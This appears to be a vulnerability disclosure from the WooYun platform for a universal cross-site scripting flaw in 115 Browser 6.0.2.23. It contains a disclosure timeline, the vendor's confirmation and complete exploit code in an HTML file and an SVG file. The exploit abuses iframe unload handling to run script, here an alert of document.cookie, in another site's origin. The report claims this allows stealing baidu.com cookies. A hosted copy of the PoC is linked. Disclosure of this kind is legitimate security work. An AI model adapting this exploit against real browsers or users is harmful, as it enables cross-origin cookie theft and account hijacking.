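2016-02-13: Details reported to the vendor; awaiting vendor response
2016-02-13: Vendor confirmed the issue; details disclosed to the vendor only
2016-02-16: Details opened to third-party security partners (NSFOCUS (绿盟科技), 唐朝安全巡航, 无声信息)
2016-04-08: Details disclosed to core white hats and experts in related fields
2016-04-18: Details disclosed to regular white hats
2016-04-28: Details disclosed to intern white hats
2016-05-13: Details disclosed to the public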
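This is a UXSS vulnerability, not a cross-origin vulnerability: a page on wooyun.org can directly steal the cookies of baidu.com and execute arbitrary code in the target origin. Version: 6.0.2.23
Latest version:
Exploit code: 1.html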
<body><iframe></iframe><table><b><p><iframe></iframe><script>
frames[1].onunload = function() {
  document.body.removeChild(document.querySelector('table'));
}
onunload = function() {
  // Clean up to fix some crashes during reload.
  while (document.childNodes.length) {
    document.removeChild(document.childNodes[0]);
  }
}
onload = function() {
  try{ frames[0].a }catch(e){ location.reload() };
  xof = frames[0].frameElement;
  xof.onload = function() {
    xof.onload = null;
    xof.src = 'javascript:alert(document.cookie)';
    var xmlErr = document.documentElement.appendChild(document.createElement('iframe'));
    xmlErr.src = '1.svg';
  }
  xof.src = 'http://**.**.**.**/';
}
</script></b></p></table></body>
1.svg
<svg xmlns="http://**.**.**.**/2000/svg"><script>
document.documentElement.appendChild(document.createElementNS('http://**.**.**.**/1999/xhtml', 'iframe'));
var b = top.xof.parentNode;
if (t = b.childNodes[1]) {
  // It appears that something is holding the table element alive
  // because the node destructor didn't run and its siblings' refs
  // to it weren't cleared, so it's still reachable during node
  // traversals. That'd crash when insertedInto notifications try to
  // use the node's parentOrShadowHostNode(), so make sure it has
  // a parent, and use a spare document to avoid traversal loops.
  top.frames[1].document.body.appendChild(t);
}
frames[0].onunload = function() {
  document.documentElement.appendChild(b);
  b.insertBefore(document.createElement('x'), top.xof);
}
</script><element a="1" a="2" /></svg>
Visiting 1.html executes javascript:alert(document.cookie) in the context of http://**.**.**.**/
http://mhz.pw/game/chrome/1.html
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-02-13 10:40
We confirm that the issue exists. Thank you for your support of 115 Browser!
None yet